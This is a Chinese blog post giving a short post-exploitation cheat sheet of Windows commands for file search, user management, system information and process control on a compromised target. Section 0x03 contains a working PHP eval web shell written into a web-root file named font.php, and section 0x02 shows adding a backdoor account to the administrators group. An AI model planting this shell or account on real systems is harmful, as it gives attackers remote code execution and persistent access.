后渗透基础 – Windows常用命令

最新推荐文章于 2024-08-25 12:26:45 发布
最新推荐文章于 2024-08-25 12:26:45 发布
阅读量688 收藏 2
点赞数
文章标签: 运维 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Adminxe/article/details/105926962
版权

0x00 前言

后渗透基础 – Windows常用命令 。如果知道目标存在某文件或者文件夹,又苦于不想一个一个的翻找,那么就试试 find + dir 命令吧。

0x01 全盘搜索命令

dir c:\ d:\ e:\ /s /b | find "简历.pdf"

搜索 C、D、E 盘下的文件名中带有 简历.pdf 的文件。

dir 显示目录中的文件和子目录列表。

/b 使用空格式 (没有标题信息或摘要)。

/s 显示指定目录和所有子目录中的文件。

0x02 系统用户相关

net user # 查询当前服务器所有的账户

net localgroup	# 查看计算机用户组列表

net user username # 查询指定用户的具体信息

net user username password /add # 创建一个新的账户,注意,密码设置最好选择数字+字母+特殊符号。

net localgroup administrators cs /add 
# administrators(想要提升到的用户组) cs(想要提升到指定用户组的账户)

net user user /del # 删除指定用户

quser # 查看当前服务器用户连接状态

logoff num # num指代标识符注销指定用户和服务器之间的连接,如果标识符为空,则注销当前连接,标识符可通过quser命令查看。

0x03 输入输出相关

echo 111111 # 输出显示111111
>> # 自动换行写入
>  # 覆盖原内容写入	
^  # 转义,原样特殊字符
ipconfig >> C:/1.txt # 将ipconfig的执行结果输出到C:/1.txt
echo ^<?php @eval($_POST['keefe']); ?^> >C:/AutoSet10/public_html/font.php	# 输出一句话到/www/1.php

0x04 信息查看相关

systeminfo  # 查看系统版本信息

netstat -ano	# 查看系统开放端口

tasklist /svc	# 查看系统进程

ipconfig	# 查看ip地址

ipconfig /all   #查看网络详细

whoami	# 查看当前用户

0x05 进程端口相关

tasklist	# 列出当前计算机运行的程序
taskkill /f /im xx.exe	# 结束指定程序
taskkill /f /pid 111	# 结束pid为111的端口

转载请注明:Adminxe's Blog » 后渗透基础 – Windows常用命令

Adminxe
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
渗透攻击命令和模块
Cwillchris的博客
04-12 1362
通过永恒之蓝或其他漏洞初步入侵目标主机后,如何扩大战果,下面给大家罗列了相关命令和模块 一、命令 1、arp 查看内网主机 2、background 将当前的会话转在后台运行。从而进行新的渗透测试。 如果想返回之前的会话,那么就输入“sessions -i 会话ID” 命令 3、clearev 清除系统,软件之类的所有登陆信息 4、download、upload download可以下载目标系统的文件 upload可以上传本机文件到目标系统
Windows、Linux常见的渗透测试命令
weixin_46239998的博客
04-06 1354
渗透测试命令
Metasploit后渗透命令大全讲解——超详细
渗透测试
05-14 3536
文章目录前言一、基本后渗透命令1.帮助菜单2.后台命令3.机器ID和UUID命令4.通信信道5.获取用户和进程信息6.获取系统信息7.网络命令总结 前言 获取meterpreter权限后,使用后渗透命令完成目的操作 一、基本后渗透命令 获取meterpreter可以使用的命令,用来控制目标主机 1.帮助菜单 meterpreter > help Core Commands ============= Command Description
内网渗透之某后渗透利用【网络安全】
kali_Ma的博客
03-23 3361
主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码。
内网渗透windows
qq_63980959的博客
04-05 2836
Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。
安全小白必看的Windows渗透基础命令大全
05-07 1544
在这里推荐一下我的同名公众号:程序员启航 Windows发展历史 Microsoft Windows,是美国微软公司研发的一套操作系统,它问世于1985年,起初仅仅是DOS模拟环境,后续的系统版本由于微软不断的更新升级,不但易用,也慢慢的成为家家户户人们最喜爱的操作系统。 MS-Dos 版本号 发布时间 Windows1.0 1985.11 Windows2.0 1987.12 Windows2.1 1988 Windows3.0 1990.5 ..
Windows下内网渗透常用命令总结
Sylon的博客
08-15 2345
域内信息收集常用命令 net group /domain //获得所有域用户组列表 net group zzh /domain //显示域中zzh组的成员 net group zzh /del /domain //删除域中zzh组 net group zzh andy /del /domain //删除域内zzh 群组中的成员 andy net group zzh /add /domai...
metasploit常用渗透命令.zip
09-16
本资料“metasploit常用渗透命令”主要聚焦于Metasploit框架中的常用命令,帮助用户理解和掌握其核心功能。 在Metasploit框架中,主要涉及以下几个关键概念: 1. **Meterpreter**:Meterpreter是一种动态的、功能...
渗透测试常用Linux命令.pdf
01-10
Linux 渗透测试常用命令大全 Linux 作为一款开源操作系统,广泛应用于服务器、嵌入式系统、移动设备等领域。作为一名渗透测试人员,掌握 Linux 命令是必备技能之一。本文将对 Linux 命令进行详细的介绍,并结合实践...
黑客渗透常用DOS命令
03-28
### 黑客渗透常用DOS命令详解 在网络安全领域,了解和掌握一定的DOS(Disk Operating System)命令对于分析和防御黑客攻击具有重要意义。本文将详细介绍黑客渗透过程中可能使用的DOS命令及其应用场景。 #### 1. ...
kali Linux渗透基础知识.pdf
01-25
本文将详细介绍Kali Linux渗透基础知识中的关键环节——信息收集。 信息收集是渗透测试的第一步,它涉及对目标系统进行情报分析、扫描探测、服务查点和漏洞搜索,甚至利用社会工程学技巧获取信息。这一过程旨在了解...
内网渗透常用手法.doc
07-18
### 内网渗透常用手法详解 #### 一、引言 在网络安全领域,内网渗透是一种常见的技术手段,用于评估企业或组织内部网络的安全性。本文将深入探讨黑客进行内网渗透时常用的策略和技术,帮助读者更好地理解内网渗透...
Meterpreter(后渗透命令)笔记
5L2g556F5ZWl77yf
02-17 1953
Metasploit是一个框架,加载payload成功拿下靶机后可以进行的进一步操作称之为后渗透命令。 Meterpreter命令详情 下面是一些常用的后渗透命令及实验。 基本命令: 基本命令包含Meterpreter与MSF终端,Ruby接口,目标Shell等交互命令。 background命令 如果想在MSF终端执行其他任务,可以使用backgruond命令将MSF终端隐藏在后台。 se...
msf后渗透(Meterpreter命令
2302_76986722的博客
09-17 463
6 ,获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权。kiwi_cmd 模块可以让我们使用mimikatz的全部功能, mimikatz 的命令直接在kiwi_cmd里直接使用。filenname,path这两个也可以进行设置,比如名字改成qq.exe,就会qq在提权,更容易上。
内网渗透-Metasploit之——基本后渗透命令
lza20001103的博客
04-14 1037
内网渗透-Metasploit之——基本后渗透命令
渗透测试(5)-Windows 命令
fanmeng2008的博客
01-09 1016
渗透测试人员必知的windows命令
内网渗透-Windows内网渗透
lza20001103的博客
08-15 1602
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
Windows网络服务渗透测试实战-Meterpreter后渗透
c_lanxiaofang的博客
05-17 2723
一、实验项目名称 Windows网络服务渗透测试实战-Meterpreter后渗透 二、实验目的及要求 掌握对MS17-010漏洞攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 三、复现步骤(附加文字说明加截图) 1、查看系统信息 屏幕快照 上传 下载 密码获取 Administrator:500:aad3b435b51404eeaad3b...
浏览器发送HTTP请求的过程
最新发布
学Python的小白!
08-25 869
浏览器发送HTTP请求的过程是一个复杂但有序的步骤,‌主要包括以下几个阶段:‌1.构建请求,2.查找缓存、3.DNS解析、4.建立TCP连接、5.发送HTTP请求、6.服务器处理请求、7.服务器发送响应、8.客户端处理响应、9.关闭连接。
Windows/Linux系统渗透后攻击探索基础教程
该书主要关注Windows和Linux系统的基本渗透后操作技术,强调理论而非实践,旨在向公众介绍如何在系统被入侵后进行深入的探索和利用。 书中首先阐述了渗透后操作的概念,它指的是在攻击者成功控制受害系统的阶段之后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值